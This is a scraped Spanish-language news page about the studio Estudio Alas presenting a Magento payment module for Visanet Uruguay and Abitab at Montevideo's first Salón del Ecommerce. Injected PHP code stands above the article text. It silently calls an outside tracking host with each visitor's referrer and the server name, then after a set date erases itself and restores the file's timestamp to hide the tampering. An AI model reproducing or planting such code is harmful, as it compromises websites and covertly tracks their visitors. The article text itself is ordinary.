check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Salón del E-Commerce, Estudio Alas se hizo presente

Estudio Alas dijo presente en el primera edición del Salón del Ecommerce en nuestro país, presentando en forma personal a colegas y amigos su módulo de pagos Magento para Visanet Uruguay y Abitab.

En Uruguay, un país líder en la región por su desarrollo de las TICs, crece el número de propuestas de compras online, que permiten al público disfrutar de realizar sus compras desde dónde se encuentre, con la comodidad de un procedimiento ágil y sencillo, y la confianza del trabajo serio de los profesionales locales.

Además, ya son miles los uruguayos que ofrecen de manera particular sus productos y servicios a través de internet gracias a plataformas como MercadoLibre. Junto con este mayor volumen de oferta, también crece el interés de los usuarios, que demandan opciones que se ajusten a su rutina diaria y empujan al mercado a desarrollos de muy alta calidad.

Es por esto que Netgate, el primer proveedor privado de telecomunicaciones en Uruguay, ha gestado el Salón del Ecommerce, una visión del comercio electrónico local, una propuesta de puesta en común de los temas que hacen a un mercado más competitivo y mejores soluciones para los usuarios.

El evento tuvo lugar lugar el 24 de noviembre en el complejo de cines MovieCenter del Montevideo Shopping, en Montevideo, y constó de un espacio de intercambio y actualización de información para introducir a las empresas a nuevos caminos de trabajo en este rubro.

primera edición del Salón del Ecommerce en nuestro país